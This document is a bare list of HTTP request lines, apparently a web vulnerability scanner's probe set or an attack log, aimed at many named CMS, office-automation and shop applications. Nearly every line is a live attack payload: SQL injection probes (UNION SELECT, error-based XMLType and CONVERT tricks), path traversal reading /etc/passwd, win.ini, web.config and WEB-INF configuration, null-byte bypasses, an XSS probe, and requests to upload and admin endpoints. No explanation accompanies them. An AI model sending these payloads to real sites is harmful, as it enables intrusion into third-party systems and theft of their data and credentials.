GET /php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
POST /grad/admin/admin_logo_upload.php
GET /common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
HEAD /download.ashx?files=../web.config
GET /mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
GET /?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
HEAD /jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
GET /Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
GET /jis/manage/databak/showlog.jsp?path=../showlog.jsp
HEAD /download.jsp?path=UserFiles/../download.jsp
GET /tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
GET /zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
GET /jis/interface/offer.jsp?flag=user
HEAD /jis/down.jsp?pathfile=./down.jsp%00.jpg
GET /MockLogin.aspx
GET /mobile/user.php?act=order_list
GET /seeyon/management/status.jsp
HEAD /api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
GET /monitoring?part=web.xml
GET /?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
GET /download.action?fullPath=./WEB-INF/web.xml
GET /jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
POST /jis/update/update.jsp?fn_billstatus=U
GET /install/install.php
GET /public/minify.php?f=../ooxxooxxo/hehe.js
GET /admin/index.asp
GET /plus/outside.php?id=../template/default/style/yun_index.css%00
GET /productpic.aspx?id=100611)%20and%201=char(106)%20--
GET /jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
GET /jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
POST /jcms/m_5_5/m_5_5_3/import.jsp
POST /upload!uploadImg.action
GET /AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
POST /?do=index&mod=goods
GET /index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
GET /cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
HEAD /webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
GET /MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
GET /RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
GET /Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
GET /news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
GET /client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
GET /siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
GET /admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
GET /admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
GET /admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
GET /webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
POST /plugins/phpdisk_client/client_sub.php?action=upload_file
GET /ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
GET /SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
GET /company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
POST /Web/Login.aspx
POST /Web/KeySearch.aspx?searchid=1234
GET /portal/admin/setright.aspx?id=-1
GET /infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
GET /guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
HEAD /prog/filedown.php?pe_id=MQ==
POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
GET /emlib4/format/release/aspx/eml_userwh.aspx
GET /voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
GET /kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
GET /getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
GET /letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
GET /cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
GET /web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
HEAD /Tools/stream/FlvStream.ashx?file=./Index.aspx
GET /tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
GET /webConfigSet/configSetting.aspx?url=/login/index.aspx
GET /cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
POST /mydocument/download.aspx
GET /prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
GET /cjwtlist.aspx?t=(select+convert(int%2c@@version))
GET /FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
GET /module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
GET /FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
GET /FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
GET /goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
GET /pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
GET /ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
GET /nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
GET /jis/front/sdgs/updateuser.jsp
HEAD /lm/down.jsp?pathfile=down.jsp
GET /website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
GET /Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
GET /Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
POST /meetingroom/MeetingRoom_UseInfo.asp
GET /lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
HEAD /downloadFile.action?path=index.jsp
GET /portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
GET /lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
POST /php/bill/print_addfeelog.php
GET /objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
GET /meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
GET /information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
GET /information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
GET /message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
POST /house/upload/upload.asp
POST /sbweb/Upload_Save_2.asp
GET /feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
GET /jsearch/admin/opr_forcechangepwd.jsp
GET /home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
POST /celive/live/index.php?action=1
GET /admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
GET /baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
POST /Lesktop/command.aspx
GET /Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
POST /Lesktop/sendfile.aspx
GET /Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
GET /jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
GET /jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
GET /managerNManager.action
GET /lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
GET /jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
GET /lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
GET /jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
GET /lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
GET /ModifyNewsAction.do?newsID=-12
GET /plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
POST /manage/Template/DSManage.aspx
GET /index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
GET /api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
GET /admin/admin_adminmodifypwd.aspx
GET /jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
GET /feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
GET /print/search_print_proof.jsp?proof_no=just_sql_test'
POST /include/user/mulbumentree.asp
POST /include/user/usertree.asp
GET /include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
POST /public/oa_nodebanliren_frm.asp
POST /include/chaxundetail.asp
POST /include/user/bdtreemx.asp
POST /admin/Fileup.aspx?path=notice/upload
GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
GET /inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
GET /Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
GET /ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
GET /piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
GET /schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
POST /common/mod/ajax.ashx
GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
POST /dakai.aspx
